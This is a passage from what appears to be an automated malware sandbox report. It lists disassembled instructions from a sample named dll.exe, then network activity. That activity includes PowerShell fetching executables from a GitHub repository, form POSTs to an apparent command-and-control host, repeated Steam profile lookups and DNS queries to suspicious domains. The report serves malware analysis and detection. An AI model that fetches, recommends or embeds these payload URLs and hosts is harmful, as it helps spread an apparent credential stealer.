            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 6D58C181h16_2_00391890
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-4926828Eh]16_2_00391890
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+04h]16_2_00383143
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h16_2_003BC2A0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then lea ecx, dword ptr [eax+eax]16_2_00382AF8
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then lea ecx, dword ptr [eax-40000000h]16_2_00382AF8
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then lea edx, dword ptr [ecx+ecx]16_2_00382AF8
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+44h]16_2_003B4300
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi+3E8E80E8h]16_2_003BD300
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then mov word ptr [ecx], bx16_2_003BD300
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], esi16_2_003BC3A0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-26h]16_2_003BC3A0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then mov ebp, ebx16_2_003BC3A0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx ecx, di16_2_0039FE40
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-1272D010h]16_2_0039FE40
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-26h]16_2_003BD7F0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]16_2_00372800
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx edx, byte ptr [003C1018h]16_2_0037F066
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then mov word ptr [edi], cx16_2_00399840
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then mov word ptr [eax], cx16_2_00380897
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx]16_2_00380897
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1ED597A4h16_2_003B80C0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0D0EF488h]16_2_0039D92B
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-26h]16_2_003BD950
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh16_2_003719E0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx esi, byte ptr [eax]16_2_003B8220
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], C446A772h16_2_0038E21B
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-4926821Eh]16_2_0038E21B
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-4926821Eh]16_2_0038E21B
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 656D2358h16_2_0038E21B
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then jmp eax16_2_0038E21B
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+70h]16_2_0038E21B
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-49268212h]16_2_0038E21B
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then mov byte ptr [ecx], dl16_2_00393A70
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then mov byte ptr [edi], cl16_2_00393A70
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+19DCC0F6h]16_2_003B5250
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx ebx, byte ptr [ebp+edi+00h]16_2_003B5250
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6BB1A2B4h]16_2_003B82E0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h16_2_003992C0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+34h]16_2_003A3330
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]16_2_0037A320
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]16_2_0037A320
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+00000104h]16_2_0038C833
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+5Ch]16_2_0039F430
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then mov word ptr [eax], cx16_2_00380C1B
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx]16_2_00380C1B
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then mov byte ptr [ecx], dl16_2_00381C5F
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+49408C66h]16_2_00398CB0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+50h]16_2_003A05B2
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+6D3F2F7Eh]16_2_00390D90
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx edx, byte ptr [eax]16_2_003B8590
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then mov byte ptr [eax], cl16_2_0038EDDC
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx edx, byte ptr [ebp+ecx+00h]16_2_0037CE30
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx ebx, byte ptr [eax+esi]16_2_0037CE30
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]16_2_0038AE40
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]16_2_003936EB
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+1A92C912h]16_2_0037C710
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax]16_2_0038AF00
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-4926828Ah]16_2_0038AF00
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]16_2_003A3FB0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then mov byte ptr [eax], cl16_2_0038EFAD
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+18h]16_2_0037EFAE
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+04h]16_2_00382FDB
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-2Ah]16_2_003BC7D0

            Networking

            barindex
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621BF20B0 InternetOpenA,GetLastError,InternetOpenUrlA,GetLastError,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn, http://api.ipify.org22_2_00007FF621BF20B0
            Source: global trafficTCP traffic: 192.168.2.5:57846 -> 89.208.104.175:5000
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
            Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
            Source: Joe Sandbox ViewIP Address: 23.197.127.21 23.197.127.21
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57833 -> 23.197.127.21:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57835 -> 23.197.127.21:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57837 -> 23.197.127.21:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57842 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57849 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57852 -> 23.197.127.21:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57839 -> 23.197.127.21:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57858 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57848 -> 23.197.127.21:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57861 -> 23.197.127.21:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57856 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57854 -> 104.21.96.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57862 -> 104.73.234.102:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57863 -> 104.73.234.102:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57857 -> 23.197.127.21:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57855 -> 23.197.127.21:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:57864 -> 104.73.234.102:443
            Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:57836 -> 185.199.110.133:443
            Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:57831 -> 140.82.121.4:443
            Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:57832 -> 185.199.110.133:443
            Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:57834 -> 140.82.121.4:443
            Source: Network trafficSuricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 185.199.110.133:443 -> 192.168.2.5:57836
            Source: Network trafficSuricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 185.199.110.133:443 -> 192.168.2.5:57832
            Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:57841 -> 185.199.110.133:443
            Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:57838 -> 140.82.121.4:443
            Source: Network trafficSuricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 185.199.110.133:443 -> 192.168.2.5:57841
            Source: unknownDNS traffic detected: query: weaponrywo.digital replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: crosshairc.life replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: htardwarehu.icu replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: kbracketba.shop replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: bugildbett.top replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: latchclan.shop replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: legenassedk.top replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: jowinjoinery.icu replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: mrodularmall.top replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: cjlaspcorne.icu replaycode: Name error (3)
            Source: unknownDNS traffic detected: query: featureccus.shop replaycode: Name error (3)
            Source: global trafficHTTP traffic detected: GET /deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /deripascod/coderoom/refs/heads/main/mtohpasekfaddd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /deripascod/coderoom/refs/heads/main/opyksdkawddd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /deripascod/coderoom/raw/refs/heads/main/Service.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /deripascod/coderoom/refs/heads/main/Service.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /pLoska HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 41Host: pupmeholk.bet
            Source: global trafficHTTP traffic detected: POST /pLoska HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4wme9ISH8hj9NnyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14898Host: pupmeholk.bet
            Source: global trafficHTTP traffic detected: POST /pLoska HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KOtRjcMSGf7NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15032Host: pupmeholk.bet
            Source: global trafficHTTP traffic detected: POST /pLoska HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=sh8djImo60hJUFxsUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20541Host: pupmeholk.bet
            Source: global trafficHTTP traffic detected: POST /pLoska HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9MngIyc7tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2381Host: pupmeholk.bet
            Source: unknownTCP traffic detected without corresponding DNS query: 89.208.104.175
            Source: unknownTCP traffic detected without corresponding DNS query: 89.208.104.175
            Source: unknownTCP traffic detected without corresponding DNS query: 89.208.104.175
            Source: unknownTCP traffic detected without corresponding DNS query: 89.208.104.175
            Source: unknownTCP traffic detected without corresponding DNS query: 89.208.104.175
            Source: unknownTCP traffic detected without corresponding DNS query: 89.208.104.175
            Source: unknownTCP traffic detected without corresponding DNS query: 89.208.104.175
            Source: unknownTCP traffic detected without corresponding DNS query: 89.208.104.175
            Source: unknownTCP traffic detected without corresponding DNS query: 89.208.104.175
            Source: unknownTCP traffic detected without corresponding DNS query: 89.208.104.175
            Source: unknownTCP traffic detected without corresponding DNS query: 89.208.104.175
            Source: unknownTCP traffic detected without corresponding DNS query: 89.208.104.175
            Source: unknownTCP traffic detected without corresponding DNS query: 89.208.104.175
            Source: unknownTCP traffic detected without corresponding DNS query: 89.208.104.175
            Source: unknownTCP traffic detected without corresponding DNS query: 89.208.104.175
            Source: unknownTCP traffic detected without corresponding DNS query: 89.208.104.175
            Source: unknownTCP traffic detected without corresponding DNS query: 89.208.104.175
            Source: unknownTCP traffic detected without corresponding DNS query: 89.208.104.175
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621BF20B0 InternetOpenA,GetLastError,InternetOpenUrlA,GetLastError,InternetCloseHandle,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,_invalid_parameter_noinfo_noreturn,22_2_00007FF621BF20B0
            Source: global trafficHTTP traffic detected: GET /deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /deripascod/coderoom/refs/heads/main/mtohpasekfaddd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /deripascod/coderoom/refs/heads/main/opyksdkawddd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /deripascod/coderoom/raw/refs/heads/main/Service.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /deripascod/coderoom/refs/heads/main/Service.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /profiles/76561199822375128 HTTP/1.1Connection: Keep-AliveHost: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: IPRetrieverHost: api.ipify.orgCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: IPRetrieverHost: api.ipify.orgCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: IPRetrieverHost: api.ipify.orgCache-Control: no-cache
            Source: dll.exe, 00000010.00000002.1613159875.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
            Source: dll.exe, 00000010.00000003.1573715800.00000000011F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=1125b621d2e11a076d0cef20; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type26508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSat, 15 Mar 2025 15:39:31 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-ControlR]]$Sn equals www.youtube.com (Youtube)
